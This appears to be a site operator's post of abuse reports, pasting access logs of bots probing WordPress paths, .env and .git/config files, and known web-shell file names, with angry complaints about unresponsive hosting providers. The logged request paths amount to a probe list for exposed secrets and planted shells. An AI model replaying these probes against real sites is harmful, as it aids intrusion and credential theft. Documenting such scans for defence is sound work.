91.184.244.117 website*x.com – – [04/Oct/2025:19:28:51 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
91.184.244.117 website*x.com – – [04/Oct/2025:19:28:51 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
91.184.244.117 website*x.com – – [04/Oct/2025:19:28:51 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
91.184.244.117 website*x.com – – [04/Oct/2025:19:28:51 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
91.184.244.117 website*x.com – – [04/Oct/2025:19:28:51 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
91.184.244.117 website*x.com – – [04/Oct/2025:19:28:51 +0200] „GET /2020/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
91.184.244.117 website*x.com – – [04/Oct/2025:19:28:51 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
91.184.244.117 website*x.com – – [04/Oct/2025:19:28:51 +0200] „GET /2021/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
91.184.244.117 website*x.com – – [04/Oct/2025:19:28:51 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
91.184.244.117 website*x.com – – [04/Oct/2025:19:28:51 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
91.184.244.117 website*x.com – – [04/Oct/2025:19:28:52 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
91.184.244.117 website*x.com – – [04/Oct/2025:19:28:52 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
91.184.244.117 website*x.com – – [04/Oct/2025:19:28:52 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“

ABUSE-MAIL NR. 10 – WEEKEND!

abuse@datacamp.co.uk, dmzhostabuse@gmail.com,abuse@att.net,abuse@virtualine.org

AS48090 – TECHOFF SRV LIMITED – AGAIN AND AGAIN EVERY DAY!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
45.148.10.160 website*x.de – – [04/Oct/2025:08:43:38 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0“

AS7018 – AT&T Enterprises, LLC – – AGAIN AND AGAIN THIS WEEKEND!!! – VERY IGNORANT AND UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
69.232.98.21 website*x.de – – [04/Oct/2025:17:16:44 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS214940 – KPROHOST LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY IGNORANT AND UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
213.209.157.253 www.website*x.de – – [05/Oct/2025:03:48:13 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.5(0x17000523) NetType/4G Language/zh_CN“
213.209.157.253 website*x.de – – [05/Oct/2025:07:53:54 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36“

AS212238 – Datacamp Limited – NOW VERY UNWANTED PROVIDER! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ONLY 1 ANSWER! – NEEDS UP TO 48 HOURS TO DO ANYTHING!!! THIS IS A NOGO!
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:06 +0200] „GET /manager.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:07 +0200] „GET /bless.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:07 +0200] „GET /O-Simple.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:07 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:07 +0200] „GET /zwso.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:08 +0200] „GET /chosen.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:08 +0200] „GET /about.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:08 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:09 +0200] „GET /.well-known/login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:10 +0200] „GET /mah.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:10 +0200] „GET /.wp/wso.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:10 +0200] „GET /core.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:10 +0200] „GET /robots.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:11 +0200] „GET /inputs.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:11 +0200] „GET /mini.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:11 +0200] „GET /goods.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:12 +0200] „GET /file5.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:12 +0200] „GET /ahax.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:12 +0200] „GET /f35.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:12 +0200] „GET /simple.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:12 +0200] „GET /update/f35.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:13 +0200] „GET /wp-content/hello.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:13 +0200] „GET /wp-admin/maint/bootstrap.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:13 +0200] „GET /themes/zMousse/otuz1.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:14 +0200] „GET /wp-content/edit-wolf.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:14 +0200] „GET /wp-content/plugins/ubh/up.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:14 +0200] „GET /wp-admin/images/bootstrap.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:15 +0200] „GET /images/upload.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:15 +0200] „GET /wp-content/plugins/seoplugins/db.php?u HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:15 +0200] „GET /wp-content/themes/pridmag/db.php?u HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:16 +0200] „GET /wp-content/plugins/linkpreview/db.php?u HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:16 +0200] „GET /admin/uploads/bn_1_1754420677.phtml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:16 +0200] „GET /modules/mod_simplefileuploadv1.3/elements/udd.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:17 +0200] „GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:17 +0200] „GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
84.17.58.169 website*x.de – – [05/Oct/2025:00:08:17 +0200] „GET /wp-admin/css/colors/midnight/admin.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0“
… and so on… and son on!!!

ABUSE-MAIL NR. 11 – WEEKEND!

abuse@retail.telecomitalia.it,abuse@clouvider.net,abuse@cheapy.host,abuse@microsoft.com, msftcs@microsoft.com,cert@microsoft.com

AS3269 – Telecom Italia S.p.A. – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
IS NOW ANSWERED! – due disciplinary measures about his customer are on the way! – THIS IS VERY GOOD!!!
82.56.173.29 website*x.com – – [04/Oct/2025:21:57:47 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS62240 – Clouvider – AGAIN AND AGAIN EVERY DAY!!! – VERY IGNORANT AND UNWANTED!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
45.149.173.217 website*x.com – – [04/Oct/2025:22:47:31 +0200] „GET /wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.217 website*x.com – – [04/Oct/2025:22:47:31 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.217 website*x.com – – [04/Oct/2025:22:47:32 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.217 website*x.com – – [04/Oct/2025:22:47:32 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.217 website*x.com – – [04/Oct/2025:22:47:32 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.217 website*x.com – – [04/Oct/2025:22:47:32 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.217 website*x.com – – [04/Oct/2025:22:47:33 +0200] „GET /website/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.217 website*x.com – – [04/Oct/2025:22:47:33 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.217 website*x.com – – [04/Oct/2025:22:47:33 +0200] „GET /news/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.217 website*x.com – – [04/Oct/2025:22:47:33 +0200] „GET /2018/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.217 website*x.com – – [04/Oct/2025:22:47:34 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.217 website*x.com – – [04/Oct/2025:22:47:34 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.217 website*x.com – – [04/Oct/2025:22:47:34 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.217 website*x.com – – [04/Oct/2025:22:47:34 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.217 website*x.com – – [04/Oct/2025:22:47:35 +0200] „GET /media/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.217 website*x.com – – [04/Oct/2025:22:47:35 +0200] „GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.217 website*x.com – – [04/Oct/2025:22:47:35 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.217 website*x.com – – [04/Oct/2025:22:47:35 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.217 website*x.com – – [04/Oct/2025:22:47:35 +0200] „GET /sito/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“

AS401120 – cheapy.host LLC – VERY IGNORANT AND UNWANTED!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
196.251.85.14 website*x.com – – [05/Oct/2025:01:43:18 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
196.251.85.14 website*x.com – – [05/Oct/2025:01:43:21 +0200] „GET /public/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
196.251.85.14 website*x.com – – [05/Oct/2025:01:43:24 +0200] „GET /mt/mt-xmlrpc.cgi HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
196.251.85.14 website*x.com – – [05/Oct/2025:01:43:24 +0200] „GET /blog/mt/mt-xmlrpc.cgi HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
196.251.85.14 website*x.com – – [05/Oct/2025:01:43:27 +0200] „GET /cgi/mt/mt-xmlrpc.cgi HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
196.251.85.14 website*x.com – – [05/Oct/2025:01:43:30 +0200] „GET /wp-content/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“

AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
48.210.45.29 website*x.com – – [05/Oct/2025:10:36:27 +0200] „GET /wp-content/themes/seotheme/db.php?u HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
48.210.45.29 website*x.com – – [05/Oct/2025:10:36:27 +0200] „POST /wp-plain.php HTTP/1.0“ 302 – „www.google.com“ „Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
48.210.45.29 website*x.com – – [05/Oct/2025:10:36:27 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
48.210.45.29 website*x.com – – [05/Oct/2025:10:36:28 +0200] „GET /wp-content/themes/seotheme/db.php?u HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

ABUSE-MAIL NR. 12 – WEEKEND!

abuse@three.ie, abuse@cheapy.host

AS13280 – Three Ireland (Hutchison) limited – NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
80.233.38.3 website*x.com – – [04/Oct/2025:20:44:51 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS401120 – cheapy.host LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY IGNORANT AND UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
HERE WITH 2 IP´S!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
196.251.86.13 website*x.com – – [05/Oct/2025:09:17:53 +0200] „GET /sites/all/libraries/plupload/plupload/examples/upload.php HTTP/1.0“ 403 – „-“ „ALittle Client“
+
196.251.86.13 website*x.com – – [05/Oct/2025:10:33:49 +0200] „GET /sites/all/libraries/plupload/plupload/examples/upload.php HTTP/1.0“ 403 – „-“ „ALittle Client“

ABUSE-MAIL NR. 13 – WEEKEND!

abuse@mts.by,abuse@creanova.org, abuse.br@telefonica.com

AS25106 – Mobile TeleSystems JLLC – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ALSO BELARUS IS COMPLETE UNWANTED AND COMPLETE BLOCKED!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
134.17.14.34 website*x.com – – [04/Oct/2025:23:04:10 +0200] „GET /style.php HTTP/1.0“ 302 20 „-“ „Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)“

AS51765 – Oy Creanova Hosting Solutions Ltd. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
HERE HACKER-IDIOTS WITH HACKING-ATTEMPTS TO “ DIFFERENT WEBSITES!!!
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:26 +0200] „GET /wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:27 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:27 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:27 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
